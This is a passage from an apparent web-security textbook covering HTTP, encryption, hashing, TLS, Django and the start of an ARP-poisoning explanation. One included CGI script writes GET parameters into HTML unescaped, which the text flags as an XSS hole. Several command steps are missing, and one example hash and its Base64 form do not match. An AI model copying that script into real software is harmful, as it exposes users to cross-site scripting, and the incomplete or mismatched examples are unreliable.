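    # The port is appended to the hostname only when it is not the default.
    host_value = host if port == 80 else f"{host}:{port}"
    lines = [f"GET {path} HTTP/1.1", f"Host: {host_value}"]
    for name, value in (extra_headers or {}).items():
        lines.append(f"{name}: {value}")
    # A blank line marks the end of the headers.
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")

def send_request(host, path="/", port=80):
    """Send the request over a plain TCP socket and return the raw response."""
    request = build_request(host, path, port, {"Connection": "close"})
    with socket.create_connection((host, port), timeout=5) as sock:
        sock.sendall(request)
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:  # the server has closed the connection
                break
            chunks.append(data)
    return b"".join(chunks)

print(build_request("localhost").decode("ascii"))
```

Calling send_request("localhost") inside the Coffeeshop VM should return the raw bytes of the response, headers included.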
If the server is listening on the requested port, the client will receive a
response. It has a similar format to the request. An example is
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 07:27:47 GMT
Server: Apache/2.4.41 (Ubuntu)
...
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en">
...
</html>
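As a rough sketch of how a client might take such a response apart, the following function splits a raw response into its status code, reason phrase, headers, and body. The function name parse_response is hypothetical, and the code assumes a well-formed, text-only response; real clients handle many more cases.

```python
def parse_response(raw):
    """Split a raw HTTP response into status code, reason, headers, and body."""
    # Headers and body are separated by a blank line.
    head, _, body = raw.partition("\r\n\r\n")
    status_line, *header_lines = head.split("\r\n")
    _version, code, reason = status_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        # Header names are case-insensitive, so normalize to lowercase.
        headers[name.strip().lower()] = value.strip()
    return int(code), reason, headers, body

raw = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.4.41 (Ubuntu)\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "\r\n"
    "<!DOCTYPE html>\n<html lang=\"en\"></html>"
)
code, reason, headers, body = parse_response(raw)
print(code, reason, headers["content-type"])
```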
HTTP requests are plain text, and so long as the response’s content type is not
binary (e.g., image/jpeg), responses are plain text also. In this exercise, we
will request a resource in the simplest way possible: using Telnet.
You will need your Coffeeshop VMs built. See Chapter 2 if you have not done
this. Once you have your VMs, open a terminal window and change to the
coffeeshop/django/coffeeshop/vagrant directory. Now connect to the
Coffeeshop VM with
vagrant ssh
At the Bash prompt inside the Coffeeshop VM, connect to the web server
running on this host with Telnet:
telnet localhost 80
You can now type a request. The web server will respond in the same session.
Type the following:
GET / HTTP/1.1
Host: localhost
followed by a blank line. Within a few seconds, the server will send the
response, and the Telnet session will end.
A client will typically send more headers after the Host: line. One
header is User-Agent, which describes the browser and operating system.
Servers can use this to identify the browser and customize the response
accordingly. However, it’s important to note that browsers can send what
they like. Hackers can abuse this feature (see Chapter 7).
In the next exercise, we will explore the headers sent by Chrome and
Firefox and the headers sent back by our Coffeeshop application.
Open Chrome and visit our Coffeeshop site by entering the following into the
URL bar:
http://10.50.0.2
Open Chrome’s Developer tools: click on the vertical three dots in the top-
right corner of the browser and select Developer Tools from the pop-up menu,
inside More. See Figure 4-1. When the Developer Tools pane pops up, click on
the Network tab at the top.
If you don’t see any resources in the Name column (see Figure 4-1, where
10.50.0.2 is highlighted), reload the page with Ctrl-R (Cmd-R on Mac). Click on
10.50.0.2, then on the Headers tab.
You should see three sections: General, Response Headers, and Request
Headers. If you scroll through the Request Headers section, you can view the
headers Chrome sent to the server. You can toggle between formatted and raw
display by clicking on View raw/View parsed.
Repeat the exercise with Firefox. The developer tools are called Web Developer
Tools and are under More tools when you click on the three horizontal bars at
the top-right of the browser (see Figure 4-2).
Request Methods
So far we have seen the GET method for requesting resources. The other
methods are HEAD, OPTIONS, POST, PUT, DELETE, CONNECT, PATCH, and
TRACE. Two others, LINK and UNLINK, were previously defined but have
fallen out of use.
Table 4-1 lists the HTTP methods and their purposes. Unless writing
REST APIs, you will most commonly use GET and POST. REST APIs are
discussed in Chapter 6.
The POST, PUT, and PATCH methods take parameters in the request
body. The GET method optionally takes parameters on the URL, after the
resource name and a question mark, for example:
http://coffeeshop.com/viewproduct?id=100&ccy=USD
As URLs cannot contain spaces, when they appear in parameters,
they must be encoded as a plus + or as %20. An actual plus sign must
be encoded as %2B. Every other character, other than uppercase A–Z,
lowercase a–z, digits 0–9, tilde ~, minus -, full stop ., and underscore _,
must be encoded as a percent % followed by its two-character hexadecimal
code. This is called URL encoding.
The Content-Type header defines the format of the body. A common
format for POST requests is application/x-www-form-urlencoded. The
parameters are URL encoded just as they are for GET, except they are in the
body, not the URL, for example:
user=bob&password=bobPass123
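Python's standard urllib.parse module implements these rules. The short sketch below shows both space encodings, the encoding of a literal plus sign, and how a set of parameters is turned into a query string or form body. The sample values are our own.

```python
from urllib.parse import quote, quote_plus, unquote_plus, urlencode

# A space can be encoded either as + or as %20.
print(quote_plus("flat white"))       # flat+white
print(quote("flat white", safe=""))   # flat%20white

# A literal plus sign must itself be encoded.
print(quote_plus("1+1"))              # 1%2B1

# Building a query string (GET) or a form body (POST) from parameters.
query = urlencode({"id": 100, "ccy": "USD"})
body = urlencode({"user": "bob", "password": "bob Pass&123"})
print(query)
print(body)

# Decoding reverses the process.
print(unquote_plus("bob+Pass%26123"))
```

The same encoded string is placed after the question mark for a GET request or in the body for an application/x-www-form-urlencoded POST request.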
Response Codes
HTTP response codes are numbers between 100 and 599. They are
grouped as follows:
A full list is given in Table 4-2, but the codes you will use most often are
the following:
Code  Name
1xx: informational
100   Continue
101   Switching Protocols
2xx: success
200   OK
201   Created
202   Accepted
203   Non-authoritative Information
204   No Content
205   Reset Content
206   Partial Content
3xx: redirect
300   Multiple Choices
301   Moved Permanently
302   Found
303   See Other
304   Not Modified
305   Use Proxy
307   Temporary Redirect
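The grouping of response codes by their first digit can be sketched with Python's standard http.HTTPStatus enumeration. The describe function and the CLASSES dictionary are our own names. The labels for the 4xx and 5xx groups are the conventional ones and are an assumption here.

```python
from http import HTTPStatus

# The first digit of the code determines its class.
CLASSES = {
    1: "informational",
    2: "success",
    3: "redirect",
    4: "client error",   # conventional label, assumed
    5: "server error",   # conventional label, assumed
}

def describe(code):
    """Return the class of a status code and its standard name."""
    return CLASSES[code // 100], HTTPStatus(code).phrase

for code in (200, 301, 404, 500):
    print(code, *describe(code))
```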
Public-key encryption uses two keys. The sender uses the recipient’s
public key to encrypt data, and the recipient uses their private key to
decrypt them. The public key can be derived from the private key but not
vice versa (at least not easily).
The benefit of public-key encryption is that the encryption key
need not be kept secret. A disadvantage is that sending the same data to
multiple recipients requires encrypting them with each recipient’s public
key separately. Another disadvantage is that it is slower than symmetric-
key encryption.
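The idea of encrypting with one key and decrypting with another can be illustrated with textbook RSA using tiny numbers. This is a toy sketch only: the primes are far too small to be secure, there is no padding, and the function names are our own. It requires Python 3.8 or later for the modular inverse.

```python
# Textbook RSA with tiny primes. Illustration only; never use for real data.
p, q = 61, 53
n = p * q                    # modulus, shared by both keys
phi = (p - 1) * (q - 1)
e = 17                       # public exponent
d = pow(e, -1, phi)          # private exponent: the inverse of e modulo phi

public_key = (e, n)
private_key = (d, n)

def encrypt(m, key):
    """Encrypt the integer m (which must be smaller than n) with the public key."""
    exponent, modulus = key
    return pow(m, exponent, modulus)

def decrypt(c, key):
    """Decrypt the integer c with the private key."""
    exponent, modulus = key
    return pow(c, exponent, modulus)

message = 65
cipher = encrypt(message, public_key)
print(cipher, decrypt(cipher, private_key))
```

Anyone holding the public key can run encrypt, but only the holder of the private key can reverse it.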
Symmetric-Key Algorithms
Symmetric-key algorithms can be block or stream ciphers. Block ciphers
work on a fixed-length block of data. Data are split into chunks of the
required size, and the last chunk is padded if necessary.
Stream ciphers encode data in a continuous stream rather than
in blocks.
The security of an encryption algorithm depends, among other things, on
the length of its key. Longer keys are harder to guess, but encryption and
decryption take longer. We measure key lengths in bits.
The most common block cipher symmetric-key algorithms are AES
[9] and DES [5]. Of the two, AES is newer and considered more secure.
DES, with its 56-bit key, is no longer considered safe against brute-force
attacks. AES comes in 128-, 192-, and 256-bit versions (commonly abbreviated
as AES-128, AES-192, and AES-256). NIST, the US National Institute of
Standards and Technology, considers any AES key length of 128 bits and
above to be acceptably secure [3].
Other block ciphers include RC5 and RC6. RC4 is a stream cipher.
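To get a feel for why key length matters, the following back-of-the-envelope sketch compares the number of possible keys for a 56-bit key (the DES key size) and a 128-bit key. The guessing rate of one trillion keys per second is a purely hypothetical figure chosen for illustration.

```python
SECONDS_PER_YEAR = 60 * 60 * 24 * 365

def keyspace(bits):
    """Number of possible keys of the given length."""
    return 2 ** bits

def years_to_search(bits, guesses_per_second=10**12):
    """Time to try every key at a hypothetical, assumed guessing rate."""
    return keyspace(bits) / guesses_per_second / SECONDS_PER_YEAR

for bits in (56, 128, 256):
    print(f"{bits}-bit key: {keyspace(bits):.3e} keys, "
          f"{years_to_search(bits):.3e} years to search")
```

Each additional bit doubles the number of keys an attacker must try.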
RSA ENCRYPTION
In this exercise, we will encrypt and decrypt some text using RSA. Begin
by entering the Coffeeshop VM by running the following command within
Coffeeshop’s vagrant directory:
vagrant ssh
Create a text file called plain.txt using Nano, Pico, or Vi, for example:
nano plain.txt
Enter some text and save the file. You can enter any text you like. For our
example, we have entered
Now is the time for all good men to come to the aid of
the party.
Before we can encrypt the file, we must create a public-private key pair. We
will use the openssl command. Enter the following:
This will create a 2048-bit private key and save it to private.pem. If you
look at the file, you will see it is encoded as ASCII text:
> cat private.pem
Next, extract the public key from the private key with
The file cipher.dat is binary, but you can view it with the hexdump
command:
> hexdump cipher.dat
Hashing
Related to encryption is hashing. Hashing also makes data unreadable.
Unlike encryption, there is no way to reverse the process: hashing is a one-
way function.
Hashing is useful for storing passwords. When a user registers at a
website and they enter a password, that password is stored server side in
hashed form, or it should be. When the user types the password to log in, it
is hashed again and compared with the stored hash. The advantage of this
approach is that if the password file is compromised, users’ passwords are
not disclosed (we will return to this topic in Chapter 9).
Hashes do not have to be the same length as the plaintext. Hashes
are often used to create a digest or checksum of plaintext, which is used
to confirm integrity. To do this, the owner of data creates a hash. The
recipient also creates a hash and checks it matches the owner’s (of course,
the recipient must trust the authenticity of the owner’s hash).
As hashes are shorter than the plaintext, they are not necessarily unique.
If two sets of data result in the same hash, it causes a collision. In practice,
this rarely causes problems. A good hashing algorithm has high entropy: a lot
of information is coded in a small number of characters (human languages
have a much lower entropy). Hashing algorithms are also designed so that
even a small change to the plaintext will result in a different hash.
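These properties are easy to observe with Python's standard hashlib module. In the sketch below, the helper name sha256_hex is our own. Two inputs that differ by a single character produce different digests, and the digest length does not depend on the input length.

```python
import hashlib

def sha256_hex(text):
    """Return the SHA-256 digest of text as hexadecimal digits."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()

a = sha256_hex("Now is the time for all good men to come to the aid of the party.")
b = sha256_hex("Now is the time for all good men to come to the aid of the party!")
short = sha256_hex("x")

print(a)
print(b)
print(len(a), len(b), len(short))  # always 64 hexadecimal digits (256 bits)
```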
Base64 Encoding
As we saw in the previous exercise, encryption and hashing algorithms
produce binary data, even if the plaintext is ASCII. This is problematic if
a protocol requires an ASCII representation. One solution is to represent
the bytes as hexadecimal characters. Each byte therefore takes two bytes
to encode, as two hexadecimal characters are needed to represent an
8-bit number.
Base64 is a more efficient encoding algorithm that converts binary
data to text by encoding every three 8-bit bytes as four 6-bit bytes. If the
plaintext length is not a multiple of three, it is padded. Thus, a Base64-
encoded string is a third longer (or a little more if padded) than the original
binary data.
Base64 is often used in preference over hexadecimal notation as fewer
bytes are required. The key files we created in the previous exercise were
encoded using Base64.
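The size difference between the two representations can be checked with Python's standard base64 module. This sketch encodes a 32-byte SHA-256 digest both ways; the input data is arbitrary.

```python
import base64
import hashlib

digest = hashlib.sha256(b"example data").digest()    # 32 raw bytes

as_hex = digest.hex()                                 # two characters per byte
as_b64 = base64.b64encode(digest).decode("ascii")     # four characters per three bytes

print(len(digest), len(as_hex), len(as_b64))          # 32 64 44

# Padding appears when the input length is not a multiple of three.
print(base64.b64encode(b"abc"))   # b'YWJj'
print(base64.b64encode(b"ab"))    # b'YWI='
print(base64.b64encode(b"a"))     # b'YQ=='

# Both encodings are reversible.
assert bytes.fromhex(as_hex) == digest
assert base64.b64decode(as_b64) == digest
```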
We will create a SHA-256 checksum of some sample data. First, SSH to your
Coffeeshop VM with
vagrant ssh
As in the previous example, we will create a text file called plain.txt. At the
Bash prompt inside the Coffeeshop VM, create a file with your favorite Linux
editor, for example:
nano plain.txt
Now is the time for all good men to come to the aid of
the party.
SHA256(data.txt)= d9a9849f2db7b54a8a1b4c0c593830437d95df5c6261ed4cd2afcf65ff25a63a
The length will be the same regardless of the number of characters in
data.txt. This is the SHA-256 hash represented as hexadecimal digits.
The SHA hash is the second part of the line after the space. Copy this into the
clipboard and paste it into a file. We will call this file sha.txt. Let’s convert
it to Base64. To do this, we must first convert the hexadecimal digits back to
binary, for which we can use the xxd command. Enter the following:
You should see the Base64 representation of your SHA hash, in our example
Ac2THEX48N5Yutf+QJ41i1Yi7h38tMZIv3euXVlu2so=
Digital Signatures
Digital signatures differ from both encryption and hashing. They enable
a recipient of data to verify its integrity. The sender encrypts data using
their private key, not the recipient’s public key. This forms a signature that
is sent along with the plaintext. The recipient decrypts the signature using
the sender’s public key and checks the plaintext matches the version in
the signature. For secrecy, the plaintext or the entire message can also be
encrypted with the recipient’s public key.
This results in a signature that grows with plaintext size. To obtain
a short, fixed-length signature, a hashing algorithm such as SHA is
first applied to the plaintext, and the hash is signed rather than the full
plaintext data.
The process is illustrated in Figure 4-3. The process works because
if the decrypted data matches the original data, only the sender could
have signed it (or someone else who has the sender’s private key). If the
plaintext data changed, it will not match the version contained in the
signature.
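The hash-then-sign process can be sketched with the same textbook RSA arithmetic, again as a toy. The two primes below are small Mersenne primes chosen for convenience, there is no padding scheme, and the digest is reduced modulo N only so that it fits this small modulus. Real signatures use much larger keys and a standardized padding scheme. All names are our own.

```python
import hashlib

# Toy key pair built from two Mersenne primes; far too small for real use.
P, Q = 2**61 - 1, 2**89 - 1
N = P * Q
E = 65537                                 # public exponent
D = pow(E, -1, (P - 1) * (Q - 1))         # private exponent (Python 3.8+)

def digest_as_int(message):
    """Hash the message, then reduce the digest to fit the toy modulus."""
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % N

def sign(message):
    """The sender applies their private key to the hash of the message."""
    return pow(digest_as_int(message), D, N)

def verify(message, signature):
    """The recipient applies the public key and compares with their own hash."""
    return pow(signature, E, N) == digest_as_int(message)

text = b"Now is the time for all good men to come to the aid of the party."
sig = sign(text)
print(verify(text, sig))                  # the unchanged message verifies
print(verify(text + b"!", sig))           # a changed message does not
```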
The advantages of digital signatures over hashes are as follows:
• The public key only has to be sent once, not for each
message as a checksum would. It can be sent on a side
channel.
We will sign some text using RSA and then verify the signature matches the
original data. Begin by entering the Coffeeshop VM by running the following
command within the Coffeeshop’s vagrant directory:
vagrant ssh
Create a text file called plain.txt using your favorite Linux editor, for
example:
nano plain.txt
Enter some text and save the file. Once again, we have entered
Now is the time for all good men to come to the aid of
the party.
We can now sign plain.txt. The openssl dgst command can create a
SHA-256 hash and sign it in one step. Enter the following:
The file sig.dat is binary, but you can view it with the hexdump command:
> hexdump sig.dat
0000000 9f3b 3777 21f0 23c3 fad0 64d3 9e7a 17aa
0000010 efe3 debe e084 47df 99f4 222c f7e7 d2a1
...
00000f0 5b96 c52f 5212 6e75 aca8 a1c4 3c56 0afe
0000100
If the hash inside sig.dat matches the hash of the text in plain.txt,
you should see the response
Verified OK
Key Exchange
Public-key encryption is very useful because only public keys need to be
transmitted, keeping the private keys secret. However, symmetric-key
algorithms are much faster. For this reason, public-key encryption such
as RSA is often used to securely negotiate a symmetric key. After the
exchange, symmetric-key encryption is used to exchange data.
Diffie-Hellman Key Exchange (DH) [8] is an algorithm for exchanging
keys using a public-private key pair. Its unique feature is that the
symmetric key is never transmitted and is a product of both parties’ public
and private keys.
To see how DH works, say Bob and Alice wish to communicate with
each other using a symmetric key. First, Bob and Alice agree on two
numbers: a prime number q and a number α, which is a primitive root
modulo q. These can be shared; they are not secret.
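Alice and Bob then each choose a secret number, $X_a$ and $X_b$
respectively, and calculate
$Y_a = \alpha^{X_a} \bmod q$
$Y_b = \alpha^{X_b} \bmod q$
Alice and Bob exchange $Y_a$ and $Y_b$, which are their public keys. The
values $X_a$ and $X_b$ are their private keys. Next, Alice uses Bob’s public key
and her private key to calculate
$S_a = Y_b^{X_a} \bmod q$
and Bob uses Alice’s public key and his private key to calculate
$S_b = Y_a^{X_b} \bmod q$
Both results equal $\alpha^{X_a X_b} \bmod q$, so $S_b = S_a$. This shared
value is the symmetric key, and it was never transmitted.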
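The exchange can be sketched in a few lines of Python. The numbers here are tiny so the arithmetic is easy to follow: q = 23 and α = 5 are illustrative values only, and the function names are our own. Real implementations use primes thousands of bits long.

```python
import secrets

def dh_public(alpha, private, q):
    """Compute a public key: alpha raised to the private key, modulo q."""
    return pow(alpha, private, q)

def dh_shared(their_public, my_private, q):
    """Compute the shared secret from the other party's public key."""
    return pow(their_public, my_private, q)

q, alpha = 23, 5                          # agreed in the open; not secret

x_a = secrets.randbelow(q - 2) + 1        # Alice's private key, 1..q-2
x_b = secrets.randbelow(q - 2) + 1        # Bob's private key, 1..q-2

y_a = dh_public(alpha, x_a, q)            # sent to Bob
y_b = dh_public(alpha, x_b, q)            # sent to Alice

s_a = dh_shared(y_b, x_a, q)              # calculated by Alice
s_b = dh_shared(y_a, x_b, q)              # calculated by Bob
print(s_a == s_b)
```

Only the public values cross the network; each side combines the other's public value with its own private value to arrive at the same secret.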
4.3 Authentication and Certificates
Proving Authenticity
Public-key encryption provides secrecy but not authenticity. If Alice can
decrypt Bob’s message with her private key, she is confident the message is
secret and readable only by her. However, as her encryption key is public,
she does not know if Bob or someone else sent it.
This is illustrated in Figure 4-4. Here, Alice is attempting to access
a website, coffeeshop.com. Alice makes a request to coffeeshop.com,
which is intercepted by an evil hacker. The hacker makes the same request
to coffeeshop.com using their own key. The figure shows what happens
when coffeeshop.com sends the response. The evil hacker receives and
decrypts it and then reencrypts it with their own key before forwarding it
to Alice. Alice can decrypt the data but has no way of knowing whether it
came from coffeeshop.com or the hacker.
Once cert.com has satisfied itself that the requester of the signature
is the owner of coffeeshop.com, it will send back a certificate signed
with cert.com’s private key. It will include an expiry date, between three
months’ and one year’s time. coffeeshop.com can now send this certificate
to Alice’s web browser.
Alice’s web browser is preconfigured with cert.com’s public key. It uses
this key to verify cert.com’s signature on the certificate. It then
checks that the domain name in the certificate matches the domain name
Alice made the request to. It also checks the certificate has not expired. If
these checks pass, Alice’s browser proceeds with the exchange. If not, it
warns Alice that the certificate is suspicious.
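Python's standard ssl module performs comparable checks when acting as a client. The sketch below is a minimal illustration: the function name fetch_certificate is our own, and the function needs network access, so it is defined but not called here. The default context loads the system's trusted certificate authorities and enables hostname checking.

```python
import socket
import ssl

# The default context trusts the CAs installed on the system and
# requires a valid certificate whose name matches the requested host.
context = ssl.create_default_context()
print(context.check_hostname)                      # True
print(context.verify_mode == ssl.CERT_REQUIRED)    # True

def fetch_certificate(host, port=443):
    """Connect to host over TLS and return its validated certificate as a dict."""
    with socket.create_connection((host, port), timeout=5) as sock:
        # The handshake raises ssl.SSLCertVerificationError if the
        # certificate is untrusted, expired, or for a different hostname.
        with context.wrap_socket(sock, server_hostname=host) as tls:
            return tls.getpeercert()
```

The dictionary returned by getpeercert includes the issuer and the notAfter expiry date.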
Let us examine what happens in a man-in-the-middle attack when
certificates are being sent. This is illustrated in Figure 4-6. Alice makes
a request to coffeeshop.com, which is intercepted by the evil hacker.
The hacker makes their own identical request to coffeeshop.com. They
decrypt the response and reencrypt it before sending it to Alice. However,
Alice will not accept it without a certificate. The hacker has a choice: send
coffeeshop.com’s certificate or send their own (for evilhacker.com—
cert.com will not issue them with anything else).
Types of Certificates
To obtain a TLS certificate, you must prove you own the domain the
certificate is for. For some certificates, you must also prove you own the
organization the domain belongs to.
There are three types of TLS certificate:
• Domain validated
• Organization validated
• Extended validation
Not all CAs issue all types of certificate. Let’s Encrypt is a popular, free,
open source CA. It is able to issue certificates automatically using either
an HTTP challenge, by writing a certain file to the public path on the web
server, or a DNS challenge, by putting a specific value in a DNS record. As a
result, it is only able to offer domain-validated certificates.
Browsers allow you to view certificates by clicking on the lock icon in
the address bar next to the domain name. As an illustration, PayPal’s
extended validation certificate and Hak5’s domain-validated certificate are
shown in Figures 4-7 and 4-8, respectively. These are from Firefox.
You can also sign your own certificate. These are called self-signed
certificates. Browsers will not trust them by default as they are not signed
by one of the CAs known to them. The browser will warn the visitor that
the certificate is untrusted. People can add self-signed certificates to the
browser’s trusted list. These are not suitable for public-facing production
websites but are useful for development, testing, and internal websites
where the organization can add certificate authorities to browsers. We will
create a self-signed certificate in the next chapter.
4.4 HTTPS
TLS Version 1.2
We have seen that public-key encryption is useful for avoiding the need
to exchange a secret key. However, it is much slower than symmetric-
key encryption. HTTPS uses symmetric-key encryption for performance
reasons but uses public-key encryption to create the symmetric key and
authenticate the server. The protocol for this is Transport Layer Security or
TLS [7]. It was formerly known as Secure Sockets Layer or SSL.
TLS, as its name suggests, encrypts at the transport layer level. This
means once a socket connection is established, everything across that
socket is encrypted. This includes the HTTP methods (GET, POST, etc.), the
GET and POST parameters, HTTP headers, request and response bodies,
and so on. The hostname, IP addresses, and port are not encrypted as they
are needed to establish the connection.
A TLS connection is established by a TLS handshake: a multistep
process in which the client authenticates the server and together they
establish a symmetric key to encrypt the data that follow. The TLS version 1.2
handshake is illustrated in Figure 4-9. We will look at the latest version, 1.3,
later in this section.
The client first sends its list of supported cipher suites (from which the
server will choose) and a 32-byte random value called the client random
(a 4-byte timestamp followed by 28 random bytes). This is used later to
create the symmetric key.
The server responds with its chosen cipher suite, its TLS certificate, and
its own 32-byte server random, also used to generate the symmetric key. The
client looks the CA’s name up in its list of trusted authorities. If it is found, it
authenticates the certificate and, so long as it is valid, proceeds to the next step.
The client generates a 48-byte value called the
premaster secret and sends this to the server, encrypted with the server’s
public key.
The server and client now have
• The client random
• The server random
• The premaster secret
Each can now generate the master secret. This will be the symmetric
session key for encrypting the request and response.
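How both sides arrive at the same master secret can be sketched with Python's standard hmac and hashlib modules. This follows our reading of the pseudorandom function defined for TLS 1.2 in RFC 5246, using SHA-256. The function names are our own, and the sizes used (32-byte randoms and a 48-byte premaster secret) are those given in that RFC. It is an illustration, not a substitute for a TLS library.

```python
import hashlib
import hmac
import os

def p_sha256(secret, seed, length):
    """Expand secret and seed into length bytes using repeated HMAC-SHA256."""
    output = b""
    a = seed
    while len(output) < length:
        a = hmac.new(secret, a, hashlib.sha256).digest()
        output += hmac.new(secret, a + seed, hashlib.sha256).digest()
    return output[:length]

def master_secret(premaster, client_random, server_random):
    """Derive the 48-byte master secret from the three shared values."""
    seed = b"master secret" + client_random + server_random
    return p_sha256(premaster, seed, 48)

# Values exchanged during the handshake (random here for illustration).
client_random = os.urandom(32)
server_random = os.urandom(32)
premaster = os.urandom(48)

client_side = master_secret(premaster, client_random, server_random)
server_side = master_secret(premaster, client_random, server_random)
print(client_side == server_side, len(client_side))
```

Because the premaster secret travels encrypted with the server's public key, an eavesdropper who sees both random values still cannot repeat this calculation.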
It should now be clear why the hacker in the man-in-the-middle attack
cannot simply forward the server’s certificate to Alice. If they did so, Alice
and the server would create the session key between them, and the hacker
would not be able to decrypt the data.
the client and server with each exchange. The original server key in the
certificate is used to authenticate the server but is not used to create
symmetric keys. This way, even if the attacker obtains the server’s private
key, they will be unable to decrypt previous data. This is called Perfect
Forward Secrecy.
DHE is slower than regular RSA as a new public-private key pair must
be created with each exchange. However, it does protect past data in the
event of a private key being disclosed.
4.5 Summary
In this chapter, we looked in some detail at the HTTP protocol plus its
encrypted variant, HTTPS. We also looked at symmetric- and public-key
encryption techniques. These are needed to understand how HTTPS
works but are fundamental to web application security in their own right.
They will come up in later chapters as well, for example, when we look at
encrypting passwords.
CHAPTER 5
Installing and Configuring Services
Now that we have explored how HTTP and HTTPS work, we can look at
how to set up a web server and associated services in a secure way. We
will start by looking at service architecture design: how trust boundaries
impact on protocol choices. Web frameworks make it easier to write safe
code, and we will take a look at some common options.
We looked briefly at man-in-the-middle attacks in the last chapter.
In this one, we will look at these attacks in more detail as well as how to
defend against them. We will also look at denial-of-service attacks and
what developers can do to mitigate their impact.
In the last chapter, we looked at the theory of HTTPS. After looking
at man-in-the-middle attacks, we will set up HTTPS for our Coffeeshop
application, using Let’s Encrypt as our CA.
We will also look at other techniques for securing our services: reverse
proxies, SSH tunnels, host firewalls, and TCP Wrappers.
Finally, we will move on from web servers and look at database server
security and securing the filesystem.
The database is outside the VPC and crosses the trust boundary
between it and the rest of the corporate intranet. We therefore encrypt the
database connection.
Our developers and operators need shell access on each of the servers
in the VPC. They use SSH over an externally open network interface. As
this interface crosses a trust boundary, it is encrypted. We can reduce the
attack surface by limiting SSH to just one development server, with a host
firewall or TCP Wrappers (see Section 5.7).
• Managing sessions
• Database integration
The examples in this book are based on Python and the Django
framework.1 It is open source and has been around since 2003. We chose it
for this book because it comes with many tools built in. Also, many third-
party libraries integrate with it. This makes its ecosystem consistent and
tools inter-operate well. Code written with Django can be very small and
clear. This makes code easy to read, and easy-to-read code is easier to spot
vulnerabilities in. Furthermore, it is a good tool for learning and exploring
security techniques.
Let us consider a simple GET request. In Django, we can write a
function to print a page of HTML including GET parameters passed in
the URL:
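from django.shortcuts import render

def hello(request):
    # Read the GET parameters, falling back to defaults if they are absent
    name = request.GET.get('name', 'Nobody')
    town = request.GET.get('town', 'Nowhere')
    context = {"name": name, "town": town}
    # Render hello.html with the parameters as template variables
    return render(request, 'hello.html', context)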
We put this in the views.py file and map it to a URL with the following
in urls.py:
<html>
<head><title>Hello</title></head>
Hello {{name}} from {{town}}!
</html>
The equivalent using CGI directly would be the following script placed
in the cgi-bin directory:
1 www.djangoproject.com
#!/usr/bin/env python3
import os
import sys

name = 'Nobody'
town = 'Nowhere'
# Parse the raw query string by hand (no URL decoding is performed)
if 'QUERY_STRING' in os.environ:
    params = os.environ['QUERY_STRING'].split('&')
    for param in params:
        key, value = param.split('=')
        if key == 'name':
            name = value
        elif key == 'town':
            town = value

# Headers first, then a blank line, then the body
print('Content-Type: text/html')
print('')
print('<html>')
print('<head><title>Hello</title></head>')
# The parameters are written into the page without escaping
print('<p>Hello ' + name + ' from ' + town + '!</p>')
print('</html>')
sys.exit(0)
Not only is the code longer and less clear, but we have not decoded the GET
parameters (e.g., converting %20 to space), and this will take yet more code.
Also, we have already introduced a vulnerability (cross-site scripting, more
on this in Chapter 7). And we have an uglier URL (/cgi-bin/hello.py rather
than /hello), which takes additional web server configuration to improve.
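To give an idea of the extra work involved, the following sketch uses two standard library helpers: urllib.parse.parse_qs to decode the query string and html.escape to neutralize HTML special characters in the output. The function name hello_page is our own, and this is only one of several ways the script could be repaired. Django performs both steps for us.

```python
import html
from urllib.parse import parse_qs

def hello_page(query_string):
    """Build the Hello page from a raw query string, decoding and escaping input."""
    # parse_qs decodes %20, + and other URL-encoded characters.
    params = parse_qs(query_string)
    name = params.get("name", ["Nobody"])[0]
    town = params.get("town", ["Nowhere"])[0]
    # html.escape stops user input from being interpreted as markup.
    return (
        "<html><head><title>Hello</title></head>"
        "<p>Hello " + html.escape(name) + " from " + html.escape(town) + "!</p>"
        "</html>"
    )

print(hello_page("name=Bob%20Smith&town=Basel"))
print(hello_page("name=%3Cscript%3Ealert(1)%3C/script%3E"))
```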
Another popular Python framework is Flask.2 Django is an opinionated
framework: it works best when used the way the developers intended. You
write code within the Django framework. Flask is less opinionated. You put
Flask within your application. Opinionated vs. unopinionated frameworks
is largely a matter of personal preference, but opinionated frameworks
tend to be easier to learn.
2 https://flask.palletsprojects.com
For PHP developers, the Laravel framework3 has similar goals to Django.
Like Django, it reduces the likelihood of vulnerabilities by providing libraries
for common web tasks like authentication, URL mapping, etc.
Java programmers have a number of frameworks at their disposal
including Spring Boot,4 Struts,5 and more. And for Ruby developers, there
is Ruby on Rails.6
5.3 Man-in-the-Middle Attacks
We mentioned man-in-the-middle (MitM) attacks briefly in Chapter 4.
These are situations where an attacker is able to place themselves on the
network in order to read and sometimes alter traffic between two parties.
We won’t go into MitM attacks in much detail as it goes beyond web
development. However, we will give one example to illustrate how easy it
can be for an attacker to spy on traffic if it is not encrypted.
Man-in-the-middle is a class of attack rather than one particular
technique. In each type of attack, the attacker must make changes so that
they receive packets instead of the legitimate recipient. The attacker then
forwards the packets to the correct destination, possibly altering them first.
One MitM attack is ARP poisoning, which we describe in the following.
Other attacks include DNS cache poisoning and switch table overflow.
3 https://laravel.com
4 https://spring.io
5 https://struts.apache.org
6 https://rubyonrails.org
ARP stands for Address Resolution Protocol. Devices address each other
by their MAC address. However, applications (and users) address them by
IP address or domain name (domain names being mapped to IP addresses
by DNS). ARP is the protocol that allows a device to determine the MAC
address for an IP address it wishes to communicate with.
When the HTTP response comes into the gateway from the Internet, it
is only addressed with an IP address. The gateway needs the MAC address,
so it broadcasts an ARP request, asking for 192.168.0.100 to respond with
its MAC address. Alice’s computer sends back its MAC address, and the
gateway can forward the response to Alice.
At this point, we should look at the difference between an Ethernet
switch and an Ethernet hub. A hub acts as a repeater. Any packet coming in
from one port is echoed on all the other ports. If Alice and an attacker were
on the same Ethernet hub, the attacker would not have to do any spoofing
to read Alice’s requests as the requests would reach the attacker anyway. For this reason,
hubs are considered legacy devices and are now rarely used. An Ethernet
switch knows which MAC address is on which port and only sends packets
for that MAC address to that one port. This can either be configured into
the switch manually (these are known as managed switches) or it can be
configured dynamically (these are unmanaged switches). In the latter, the
switch acts as a hub until it knows which MAC address is on which port.
ARP requests, because they are broadcast, are always sent to all ports.
In ARP poisoning, an attacker also responds to the ARP request but
